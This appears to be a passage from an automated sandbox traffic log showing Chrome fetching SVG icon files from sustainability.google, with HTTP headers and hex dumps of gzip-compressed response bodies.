                                                                                                                                                                                                                                                                                          Data Ascii: E&S~Yme93f`UY^0_5(sV*?},/UskW+%6y[|O!>B*E_L}]bo`;Y6#iZ/fV'-66wpIM~m4{{W-oO6?8+6N!) r\'OtW?.IN_BC6z2
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC768INData Raw: 39 9e cb e0 c3 ed 13 1f 95 aa f1 1e 7f be df 55 4d 1f 74 c5 c6 62 0b fc fa ee 7a 09 0c 55 41 e9 fd 35 53 81 2b 9e af b7 9b 2d 55 d5 1f eb bf ae 8c a2 fc 30 1a b5 ea 1a d7 9b fb 87 c3 18 6a d7 2b 8e 06 46 03 56 06 9e f9 08 d7 74 54 25 67 fb d4 9b 3b a8 71 7f 20 08 73 f9 c1 63 9b 30 a4 06 3d be 1f 44 7a 50 20 d5 d5 1b 54 64 18 0e 22 ac 55 15 67 c6 01 e5 7a 44 88 fc 70 f8 74 5f fd 5a 3d fe 51 e1 a6 1e 81 c4 54 07 eb 09 cc cf ba 3e fc a8 e9 59 de df 57 25 d4 d9 5f 54 ac ec ae a0 b6 f7 7e bb 9b df 6f 6b bc 20 84 d1 f9 a1 29 c3 6d 74 ab 1f 3e f2 47 cb ea a6 7c 58 1d f8 a3 f9 9c ae b9 20 43 0b f7 2b 6c 40 03 10 ba fe 73 cd 20 12 93 98 4f 3e 53 d3 47 14 60 b9 96 40 29 35 f5 42 8d 6f 71 57 2d de c1 fc 5b 43 c4 bb 1f b6 cd 08 c9 d5 50 ac a1 65 cf 62 18 e3 29 9f 57
                                                                                                                                                                                                                                                                                          Data Ascii: 9UMtbzUA5S+-U0j+FVtT%g;q sc0=DzP Td"UgzDpt_Z=QT>YW%_T~ok )mt>G|X C+l@s O>SG`@)5BoqW-[CPeb)W
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 4f 0d 0a 31 0d 0a 67 0d 0a 30 66 66 65 0d 0a fa 29 48 d8 a9 3c 3d d5 4f 41 e8 ce e4 e9 99 7e 0a 72 78 2e 4f cf f5 d3 0b 90 4e 79 7a a1 9f b2 9b 4a ff 91 b7 ea 87 e0 03 4e ac f0 1d fc c1 4f eb 71 cd ad 6b fd 68 7d 3b 06 cf 47 1e c3 5f d2 96 3c 07 65 07 15 15 d4 df fc 1a 5d 13 f8 3f 7f 87 7f f1 8b 55 79 5d ad c6 f4 6f 7e a9 fe 96 d7 35 e8 1a 79 a1 b1 20 4f 1b ff c5 6f e8 4f fe 62 5d a2 27 7e af df dc 4b 4f e8 99 c3 ff f9 05 fe c5 5f 80 6f b4 d8 d5 f7 87 b1 fc 21 4d f8 b9 b4 db 5e ff 1d bd 21 f5 1f 6e c3 3f 18 12 e8 c4 ad 30 39 fc 21 4f 1f 0e e4 55 d1 7f e4 3b f5 83 5b 80 22 e5 e7 1a db fb 7a 71 c0 95 06 ff 57 5e ab a7 02 19 9d 3d f8 bf bc 6c 78 f6 1f e3 7f f0 c3 7f 48 5b 74 0a c9 33 e4 17 f8 5b bf 53 e3 57 64 90 f7 f4 4c b7 90
                                                                                                                                                                                                                                                                                          Data Ascii: 00000001O1g0ffe)H<=OA~rx.ONyzJNOqkh};G_<e]?Uy]o~5y OoOb]'~KO_o!M^!n?09!OU;["zqW^=lxH[t3[SWdL
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: c3 35 c7 1f e8 82 6b 2f 97 00 3a d0 53 91 a0 6b 8e 57 d0 05 d7 5e 8e 41 26 ae 39 be 41 17 5c 7b b9 07 99 b8 e6 78 08 5d 70 ed e5 24 64 e2 9a e3 27 74 c1 b5 97 ab 90 89 6b 8e b7 d0 05 d7 5e 0e 43 26 ae 39 3e 43 17 5c 7b b9 0d 99 b8 e6 78 0e 5d 70 ed e7 3c 64 22 9b e7 3f 74 41 b7 a7 0b 91 8b 6f 96 17 d1 09 df 7e 8e 44 2e be 19 16 0c 82 0b 5d cc 6d c0 86 05 82 0b 67 98 c9 90 0c 2e 5c 40 f4 e1 e7 e0 82 9d 33 fd 73 70 61 53 9c e5 38 3b 39 0e 44 b6 07 d9 cb 7b c8 c1 32 c7 75 c8 c6 b2 97 df 90 83 65 8e d3 90 8d 65 2f 8f 21 07 cb 1c 77 21 1b cb 5e be 42 0e 96 39 8e 42 36 96 bd bc 84 1c 2c 73 5c 84 6c 2c fb f9 07 39 68 e6 39 07 d9 88 f6 f4 0c b2 30 cd 72 0b f2 31 ed e7 13 64 61 9a e5 10 e4 63 1a f0 06 5a d3 10 26 c5 c7 95 c6 35 37 b8 60 7c 92 58 04 e7 cc 03 f4 9e
                                                                                                                                                                                                                                                                                          Data Ascii: 5k/:SkW^A&9A\{x]p$d'tk^C&9>C\{x]p<d"?tAo~D.]mg.\@3spaS8;9D{2uee/!w!^B9B6,s\l,9h90r1dacZ&57`|X
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1305INData Raw: b3 75 96 36 22 2c 16 bb b2 6c d0 2d 12 05 92 c6 18 b6 7d 49 41 c2 25 a5 db d2 fe cb e8 65 8f 24 b6 5b e9 bf 36 65 c3 7f 6b 29 aa 69 c0 af 6c 68 ef ce 94 e5 40 6e 77 e0 c2 43 89 3d b1 ef e8 23 c0 b3 1a 02 26 05 dd 24 30 9f 51 ac 88 aa 0a 51 e3 f9 f4 8a ff cb fc a7 40 d8 95 2f 6d 10 a7 2e 88 19 83 90 b5 98 02 61 17 a2 b4 41 9c b9 20 4e 19 84 6c 28 29 10 76 5d 48 1b c4 b9 0b e2 8c 41 c8 aa 57 81 b0 8b 34 da 20 2e 5c 10 e7 0c 42 96 78 0a c4 45 82 9c af 5d 10 17 0c 42 76 45 14 88 d7 09 10 97 2e 88 d7 0c 42 36 2b 14 88 cb 04 88 37 2e 88 4b 06 21 0b 0b 05 e2 4d 02 c4 74 e2 c2 78 c3 30 24 b6 af 60 40 71 81 38 73 4d a7 2e 10 00 4b df c1 b1 32 8b bf a6 29 1e 9d fa 4c aa b9 54 62 e1 8c 4d 8a 4f a7 1e a3 02 60 c6 c6 66 d5 69 8a 57 a7 1e b3 02 60 06 63 b3 eb 34 c5 af
                                                                                                                                                                                                                                                                                          Data Ascii: u6",l-}IA%e$[6ek)ilh@nwC=#&$0QQ@/m.aA Nl()v]HAW4 .\BxE]BvE.B6+7.K!Mtx0$`@q8sM.K2)LTbMO`fiW`c4
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 33 0d 0a 30 30 30 30 30 30 30 31 0d 0a d7 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a c7 0d 0a 30 30 30 30 30 30 30 31 0d 0a d3 0d 0a 30 30 30 30 30 30 30 31 0d 0a 11 0d 0a 30 30 30 30 30 30 30 31 0d 0a 71 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4b 0d 0a 30 30 30 30 30 30 30 31 0d 0a d7 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a c9 0d 0a 30 30 30 30 30 30 30 31 0d 0a 53 0d 0a 30 30 30 30 30 30 30 31 0d 0a 13 0d 0a 30 30 30 30 30 30 30 31 0d 0a f1 0d 0a 30 30 30 30 30 30 30 31 0d 0a 34 0d 0a 30 30 30 30 30 30 30 31 0d 0a 97 0d 0a 30 31 0d 0a 16 0d 0a 32 66 65 66 0d 0a 48 1e 1b 27 16 7f 69 2a 79 ac 9c 58 fc a5 21 79 ec 1c b7 7a 2d a3 f3 58 3a 6e f8 5a 20 79 6c 9d 58 fc
                                                                                                                                                                                                                                                                                          Data Ascii: 000000013000000010000000100000001000000010000000100000001q00000001K00000001000000010000000100000001S000000010000000100000001400000001012fefH'i*yX!yz-X:nZ ylX
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: fb 72 a5 34 27 d4 b4 bd 86 85 6e 75 18 af 6a f7 c9 d6 6b f3 e0 3e 31 ba 05 0f 71 53 7d 56 c8 48 88 97 79 1e 8a a9 ee 0e 8a e5 f9 09 57 56 6a 5e c0 87 6e f7 7e 67 41 b0 5a b8 2d 98 13 0d 50 3d 1e ad 6a a0 92 ea 42 3f d1 64 e7 4f 15 f5 b7 2b 68 3c 82 81 a8 3f 1e 90 bc fc 44 fd 01 d4 0e 62 42 32 6d 8b 79 18 39 9a 01 c1 66 51 ef 40 63 61 07 d4 93 42 11 f8 61 e1 3c da ff e3 01 ea f4 aa 87 26 d9 eb cd 1d f8 ea 87 cf 02 4f b5 33 5a 14 87 4f f7 d5 5c 3d d6 ad 54 af 5e 2b f5 58 b7 42 34 bc 36 f8 f0 f3 72 35 5a 42 65 61 5c 8c 18 3a 11 9f 4a bc 44 34 1d 59 c0 e5 72 bc 44 16 53 5f a8 e5 4b b6 91 8f 99 cf a3 80 c6 85 38 13 ac 6f 4c 79 59 7b 07 15 be 51 75 84 d4 0b 6b 5b 73 71 f3 af f5 fe 7e 55 7e 1a 27 1c ee 66 99 a4 b8 43 f7 10 5b 30 09 cc 01 16 4b bd 7b 3c 66 c9 d4
                                                                                                                                                                                                                                                                                          Data Ascii: r4'nujk>1qS}VHyWVj^n~gAZ-P=jB?dO+h<?DbB2my9fQ@caBa<&O3ZO\=T^+XB46r5ZBea\:JD4YrDS_K8oLyY{Quk[sq~U~'fC[0K{<f
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: e7 46 c7 d5 0b 46 ff b1 39 1d cc c7 ef d4 d7 f1 3a a1 53 77 c7 6b 84 4e dd 0d ab 0f 8c ae 9f 85 a7 95 3a c0 44 ba 6a 67 fe ad f6 76 a1 06 d5 f5 ae dc 2c 8b d9 ec b1 58 6f 7f 2a b6 fb 8f 85 3a 9d bf 86 62 af 77 58 9c ea 76 57 7e da 2f ca 55 75 25 85 41 9c 06 e5 e6 00 45 f6 6a 28 4c b3 54 9a 83 b9 f3 cf bb ed f2 61 71 a0 fa 3a 63 a3 2a 44 66 dc ed e4 d4 f7 f2 03 71 40 ef 60 ee eb 19 ff a3 d4 ce ae da c0 d0 71 20 5b 88 59 ac a1 b8 e0 9f aa db fa ba 5e d5 87 4f 5e 98 3a 87 4e 34 fa fe 43 34 8a df 05 02 63 46 25 3f 73 b6 cc bf fd 99 1b 0e a3 80 24 33 46 5c ef cf 44 c4 fc fb 29 91 0a c8 7b 83 14 56 05 34 11 31 ff 7e 4a a4 02 5a c1 48 64 49 cb da e4 eb 93 b5 ac 04 1e 4f d4 9e 44 c2 26 d6 7a a6 87 12 19 5c c2 86 c4 68 30 09 1b 12 a9 c1 24 6c 48 a4 8e 90 b0 e9 e5
                                                                                                                                                                                                                                                                                          Data Ascii: FF9:SwkN:Djgv,Xo*:bwXvW~/Uu%AEj(LTaq:c*Dfq@`q [Y^O^:N4C4cF%?s$3F\D){V41~JZHdIOD&z\h0$lH


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          125192.168.2.749991216.239.36.214435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC705OUTGET /static/img/glue-icons.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sustainability.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://sustainability.google/?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content=
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC711INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Security-Policy: base-uri 'none'; object-src 'none'; script-src 'self' 'unsafe-inline' *.google.com *.google-analytics.com *.googleapis.com *.googletagmanager.com *.gstatic.com *.youtube.com *.ytimg.com;
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=2592000; includeSubdomains
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: bd0ba96748caf4ac6e3059a29ee22407
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:33:53 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:43:53 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=600
                                                                                                                                                                                                                                                                                          Age: 478
                                                                                                                                                                                                                                                                                          ETag: "_dVh2w"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC697INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 31 0d 0a 00 0d 0a 30 66 66 61 0d 0a 00 00 02 ff ec 9b 4b 6f e3 46 12 c7 bf 0a e1 bd 9a 1c 76 f3 bd c8 04 48 84 5d e8 20 9f 06 d0 61 6e 1a 59 b6 84 a5 25 41 92 e5 c4 9f 7e 7f ff 6a 52 96 9d 91 39 bb c1 2e 90 64 c6 63 76 b3 1f d5 d5 55 d5 f5 62 fb 87 fd f1 3e fa e5 a1 5d ef 3f 5e 2d 0f 87 ed df 3f 7c 78 7a 7a 4a 9e b2 64 b3 bb ff e0 d3 34 fd c0 88 ab 1f 7f b8 5d dc ed 7f fc 41 a3 57 b7 1f af e6 cb c5 71 b7 59 c7 ed e2 ee 70 15 1d 57 8b a7 9f 37 bf 7c bc 4a a3 34 f2 39 ff 99 b0 9d 1d 96 11 43 6f 5c 99 e4 2e 2a 78 4c 5c 11 e5 6d 5c 47 e1 c7 d1 14 eb 31 69 92 3a 8b 9c
                                                                                                                                                                                                                                                                                          Data Ascii: 000000010000000100000001000000010000000110ffaKoFvH] anY%A~jR9.dcvUb>]?^-?|xzzJd4]AWqYpW7|J49Co\.*xL\m\G1i:
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC1408INData Raw: fe b0 58 3f 0e 71 84 fd d4 4b 57 43 84 71 26 22 a4 71 f1 fa b5 92 5e a8 a7 e5 38 bb bc 0e 1a 36 3e 2e 76 83 26 04 ba d7 73 08 25 6b 06 fa 3c d8 7d 4f 87 13 19 a0 86 f1 54 d8 44 7e 2e 22 47 d0 a5 23 d2 be ef 3d 81 38 41 d0 f8 f2 3f 19 7f 49 a3 de ee 56 c7 45 bc bd bd 1b a2 1e a7 c4 25 10 ec 18 a3 d3 8f ee f9 c6 35 51 36 2e de e2 70 74 62 9e 84 a5 db d9 92 86 d7 74 98 76 e2 74 b6 99 b8 41 e0 b0 83 c6 f7 2c 4e 4a 56 4b 0a c8 81 18 26 1c 9f a3 1f a3 a4 a7 0d 62 23 3b a1 05 8a 6e 90 aa a0 f3 e0 10 b5 b1 03 b3 25 0d 53 2c 09 75 bf 14 88 69 b3 cc 8f 94 cf 0f 9c f1 ec eb 4b 20 e7 06 df 65 5f 5f 20 63 32 23 a2 54 04 c8 00 7b bc 2c 23 77 ab 76 11 4b 45 b4 9b d9 a0 91 42 e6 0b ce 64 86 41 12 60 6a 81 7c 9d cc 70 52 5e d8 dc 11 ec 41 8c 68 e2 5a 5e 8f 0e a9 2c 59 50
                                                                                                                                                                                                                                                                                          Data Ascii: X?qKWCq&"q^86>.v&s%k<}OTD~."G#=8A?IVE%5Q6.ptbtvtA,NJVK&b#;n%S,uiK e__ c2#T{,#wvKEBdA`j|pR^AhZ^,YP
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC1408INData Raw: 84 f3 96 0e fa 13 44 23 8c 77 e7 fe 04 d6 e8 e8 14 06 14 88 36 52 a0 9f bd 8b ba 7a e7 80 97 a5 48 83 73 2a e2 8e 1b a3 98 dc 38 a3 58 2e 8a 4d 15 c2 42 47 24 51 7e 15 c3 44 3a 71 49 0c 30 2e 31 3d ca 14 9c e0 47 a6 ac b4 44 35 e3 a7 89 8b 60 a4 b5 63 47 54 48 58 4d 25 76 0a 42 f0 f6 6d 00 7e a2 b5 83 5a 87 58 a4 98 8b f3 08 36 49 43 dc 75 71 d8 98 88 eb f2 22 ef b3 e5 6e 36 5f 7c d9 6c 06 e5 12 a7 46 71 07 14 e0 1c 28 ef 40 ce 21 fc ff e4 39 10 28 e8 ae ff 5a 46 aa e2 10 3b 14 43 4e d9 e0 fb 93 14 a4 c0 72 40 90 7c ca 19 02 0e 35 4c 2b 74 34 bb 5b ab 8c e4 1c ca 8c 4a 71 51 9a 02 53 79 64 b0 42 3b 8b 98 e9 a1 2a a7 4b 69 4c d9 e7 92 68 4f a0 f1 70 4d cf f3 02 f8 ec 58 05 cf 0d 35 0b 24 10 94 91 ee 36 f2 3e 55 74 52 17 b7 ab c1 9c 0f 7a 9b 9d 83 59 85 59
                                                                                                                                                                                                                                                                                          Data Ascii: D#w6RzHs*8X.MBG$Q~D:qI0.1=GD5`cGTHXM%vBm~ZX6ICuq"n6_|lFq(@!9(ZF;CNr@|5L+t4[JqQSydB;*KiLhOpMX5$6>UtRzYY
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC656INData Raw: 87 d2 27 3e 27 f1 a1 0f 00 c0 0f 4f d7 3c df c8 c4 15 a3 02 57 1d 9f dc 1e d6 12 15 9f c8 08 da 3b a5 c1 c5 b7 06 b1 ee 85 04 b0 6e 6d d0 62 c3 2f 6e fa 7e b3 b9 87 25 f3 4d bb d9 c5 24 66 37 6f f6 4f 40 f4 72 1f b3 33 8a b9 af 8b 7f e6 c1 97 e2 83 b1 be f4 b9 46 89 b9 72 49 62 84 c8 50 a1 05 41 1d 0e 3e 01 47 17 2f 28 71 a1 64 2c 37 84 6a 05 0a 90 8a 08 19 7e 28 24 51 ce 8f ef f1 29 e1 9f 5d 34 6a 7c a8 41 bd 9c d4 73 9d f1 ca 40 eb 55 0d 0a 12 d6 e8 8b 53 c6 f7 35 7d 4b e4 03 3a a1 64 39 b1 6f 12 84 e7 ba d6 d4 58 b4 a3 b4 74 f8 74 6f b8 f2 79 5a f1 12 b9 18 e7 a8 92 8d a1 6c b8 50 45 be 5d 47 44 41 c7 9c 48 49 43 08 9d 41 98 af ce cc 00 65 22 34 a2 2b 8b d5 15 4c 39 45 ad 64 92 ac 86 30 28 ab 4e 18 43 90 a4 f8 87 ad 32 80 fc 4c 4e d2 d6 9f 7f 94 b6 84
                                                                                                                                                                                                                                                                                          Data Ascii: '>'O<W;nmb/n~%M$f7oO@r3FrIbPA>G/(qd,7j~($Q)]4j|As@US5}K:d9oXttoyZlPE]GDAHICAe"4+L9Ed0(NC2LN
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC731INData Raw: 30 30 30 30 30 30 30 31 0d 0a fa 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 67 0d 0a 30 30 30 30 30 30 30 31 0d 0a 35 0d 0a 30 30 30 30 30 30 30 31 0d 0a 93 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 93 0d 0a 30 30 30 30 30 30 30 31 0d 0a d0 0d 0a 30 30 30 30 30 30 31 0d 0a 87 0d 0a 32 36 30 0d 0a 93 2f a1 37 09 b3 0c b5 7d 90 42 e1 01 b2 cc d0 67 75 0e a8 02 b9 95 4a d4 5a ca cb 94 dc e8 90 31 47 ca 19 26 14 ad a2 fb 37 ae 26 33 ca 25 22 dd 28 42 b4 98 c5 30 69 25 a9 42 8f 23 41 be ca f2 4b 7c c9 60 a2 dd 3d c2 2a 22 f5 92 3f f2 e6 aa 9d 91 ec f5 cd fc ce f8 ec 37 ed 8a 0b f3 03 c6 47 3e c1 77 6b 03 e9 31 2b 83 d6 e6 01 e9 ab 60 e5 9f d2 98 3c 78 22 7e fe 4c 02 99 fc 6e 2b fe 5f b6 e2 e6 cf
                                                                                                                                                                                                                                                                                          Data Ascii: 0000000100000001n00000001g000000015000000010000000100000001000000010000001260/7}BguJZ1G&7&3%"(B0i%B#AK|`=*"?7G>wk1+`<x"~Ln+_
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          126192.168.2.749990216.239.36.214435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC700OUTGET /static/img/icons.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sustainability.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://sustainability.google/?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content=
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC711INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Security-Policy: base-uri 'none'; object-src 'none'; script-src 'self' 'unsafe-inline' *.google.com *.google-analytics.com *.googleapis.com *.googletagmanager.com *.gstatic.com *.youtube.com *.ytimg.com;
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=2592000; includeSubdomains
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: db56d9fe481453a12b27136dd1078bfb
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:32:06 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:06 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=600
                                                                                                                                                                                                                                                                                          ETag: "_dVh2w"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 585
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC697INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a c4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 9a 0d 0a 30 30 30 30 30 30 30 31 0d 0a cb 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 47 0d 0a 30 30 30 30 30 30 30 31 0d 0a 12 0d 0a 30 30 30 30 30 30 30 31 0d 0a 86 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5f 0d 0a 30 30 30 30 30 30 30 31
                                                                                                                                                                                                                                                                                          Data Ascii: 0000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001n00000001[00000001G000000010000000100000001_00000001
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC1408INData Raw: bd 3a bb b9 be 5b de ad bf f5 0d b5 b0 e5 87 af ef 8c 31 53 39 0e b6 e3 a6 b3 0f 53 b4 29 dc 5f 8e cd 5a 49 3e 95 80 7c 1e b7 7e 7a 98 d3 c6 1c 6b fd 68 c7 7c 9b d3 47 6b 3d 63 34 3c 9a 69 74 0e d4 1e 76 d1 2d b3 e3 a0 7c b8 93 47 22 5b ff f6 7e b1 ba de ed 7e bd 5b 2f 6e ae 69 8f 12 78 77 fd ee 7f 12 e5 51 8c 67 d3 bd 08 6f ef 6e ae 7f 59 1f ad 0f 35 f8 94 45 ee 42 9f 5d 6f 53 74 b3 93 14 30 35 6b ab cc 23 14 19 5a a8 d6 8e 67 cc ec 7e 8e 94 dd bb a4 16 b3 42 e7 9d c7 8a d3 22 cd bd 54 46 0a c6 da 1a d6 3c 37 bf 47 02 a5 a7 ad cd 1d 2b c6 3e a2 d7 4f 36 38 6c 36 b6 3f 61 c8 36 c3 d8 6d cb bd 6f f8 89 b6 09 d8 67 dc 8f d5 ab b9 d7 b0 88 73 8a 65 4a 58 6c 83 0f 44 6e 2c d0 dd 7b de 8e c5 63 f7 2f dd c2 7e bd b9 42 53 9f bb 87 f8 29 95 2e a5 fc de bb 78 1d
                                                                                                                                                                                                                                                                                          Data Ascii: :[1S9S)_ZI>|~zkh|Gk=c4<itv-|G"[~~[/nixwQgonY5EB]oSt05k#Zg~B"TF<7G+>O68l6?a6mogseJXlDn,{c/~BS).x
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC1408INData Raw: 32 47 70 88 9f 74 ae 34 81 3f 79 75 3e 36 cb cc 36 cb 6c 65 b5 68 b5 f5 9a 73 c1 dc cd eb 69 a6 b6 e6 0b ed 72 8e fc c2 e1 2e d2 0a ad 91 49 a3 25 1e 2c 84 57 f0 38 b0 02 ba c1 ec 29 cb 00 b2 0a 40 7b 7c 1d a1 43 1d 71 16 f4 67 03 40 6e 8d 2b 9e aa ae 81 72 c3 0b 8e c5 60 7d 12 16 27 5c 1a 6e d2 b0 e8 da 16 24 12 da 1c b5 8a 08 82 fd 1b 4e 73 8c c5 30 0a 42 68 1b 6a 02 42 32 ca a8 49 ce d2 e7 8a ca b0 25 67 50 33 c6 b4 9f b6 b6 1a d2 c7 9b a2 5a c5 71 3a 3c 19 78 46 78 d3 80 5e 43 2a e8 20 83 11 cb 92 97 93 4b 37 b6 f5 75 4f d8 60 14 91 c3 aa 44 b8 7c cd 7a 60 89 7e b1 44 de 13 94 7c 24 f2 31 3c 2e cc f6 66 50 c5 e8 33 5d 82 96 80 05 c4 4c d6 1c d6 18 ab 12 73 90 0b 1e 5f f7 62 1c 94 6d db 96 ef bf c6 b0 b6 34 81 64 5d 61 4a 1c 82 9b 3e 6e 6a 12 96 e7 cf
                                                                                                                                                                                                                                                                                          Data Ascii: 2Gpt4?yu>66lehsir.I%,W8)@{|Cqg@n+r`}'\n$Ns0BhjB2I%gP3Zq:<xFx^C* K7uO`D|z`~D|$1<.fP3]Ls_bm4d]aJ>nj
